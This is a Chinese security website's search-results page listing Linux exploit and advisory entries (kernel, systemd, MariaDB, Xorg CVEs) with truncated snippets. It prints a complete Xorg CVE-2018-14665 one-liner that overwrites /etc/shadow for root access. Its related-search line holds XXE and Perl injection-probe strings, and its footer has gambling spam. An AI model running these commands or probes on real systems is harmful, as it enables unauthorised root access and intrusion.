首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
熱門關鍵字: shell  88888  art  vitter  linux
 :::VITTERSAFE危特網安::: >> 搜索 “linux” 結果:
Linux Kernel 4.4 rtnetlink Stack Memory Disclosure 點擊:34
  /* * [ Briefs ] * - CVE-2016-4486 has discovered and reported by Kangjie Lu. * - This is local exploit against the CVE-2016-4486. * * [ Tested version ] * - Distro : Ubuntu 16.04 * - Kernel version : 4.4.0-21-generic * - Arch : x86_64 * * [ Prerequi(2018-12-20)
Linux userfaultfd tmpfs File Permission Bypass 點擊:17
  Linux: userfaultfd bypasses tmpfs file permissions CVE-2018-18397Using the userfaultfd API, it is possible to first register auserfaultfd region for any VMA that fulfills vma_can_userfault():It must be an anonymous VMA (-vm_ops==NULL), a hugetlb VMA(2018-12-12)
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer 點擊:67
  # Exploit Title: Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp kernel pointer # Google Dork: - # Date: 2018-11-20 # Exploit Author: Jinbum Park # Vendor Homepage: - # Software Link: - # Version: Linux Kernel 4.8 (Ubuntu 16.04) # Tested on: 4.8.0-36-gen(2018-12-03)
Linux Nested User Namespace idmap Limit Local Privilege Escalation 點擊:95
  ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Linux::Priv include Msf::Post::Li(2018-11-29)
MariaDB Client 10.1.26 - Denial of Service (PoC) 點擊:38
  # Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC) # Google Dork: None # Date: 2018-11-16 # Exploit Author: strider # Software Link: https://github.com/MariaDB/server # Version: mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-(2018-11-27)
Linux - Broken uid/gid Mapping for Nested User Namespaces 點擊:30
  commit 6397fac4915a (userns: bump idmap limits to 340) increases the number of possible uid/gid mappings that a namespace can have from 5 to 340. This is implemented by switching to a different data structure if the number of mappings exceeds 5: Ins(2018-11-19)
Linux mremap() TLB Flush Too Late 點擊:74
  Linux: mremap() TLB flush too late with concurrent ftruncate() CVE-2018-18281Tested on the master branch (4.19.0-rc7+).sys_mremap() takes current-mm-mmap_sem for writing, then callsmremap_to()-move_vma()-move_page_tables(). move_page_tables() firstc(2018-10-30)
Linux systemd Symlink Dereference Via chown_one() 點擊:27
  systemd: chown_one() can dereference symlinks CVE-2018-15687[I am sending this bug report to Ubuntu, even though it's an upstreambug, as requested ata href=https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-re(2018-10-29)
Linux systemd Line Splitting 點擊:45
  systemd: reexec state injection: fgets() on overlong lines leads to line splitting CVE-2018-15686[I am sending this bug report to Ubuntu, even though it's an upstreambug, as requested ata href=https://github.com/systemd/systemd/blob/master/docs/CONT(2018-10-29)
xorg-x11-server Local Privilege Escalation 點擊:27
  #CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp root::16431:0:99999:7::: -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected. #!/bi(2018-10-29)
首頁 [2]  [3]  [4]  [5]  [6]  [7]  下一頁 末頁
相關關搜索: linux `  linux++`  Linux+4.40  linux ] print chr 49 .chr 55 .chr 73 .chr 53 .chr  linux 3C 21ENTITY 25 asd SYSTEM 5C 27http 3A 2F  linux 3C 21ENTITY 25 asd SYSTEM 22http 3A 2F 2Fo  Linux 4.40  Linux node
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved
35选7杀号技巧 重庆幸运农场开奖号码 什么股票配资 青海快3开奖软件 查北京体彩11选5开奖号 幸运飞艇全国统一开奖视频 福建快3今天开奖结果查询结果 河南481走势图今天 11选5与百家乐 上海十一选五直选三 个股票行情查询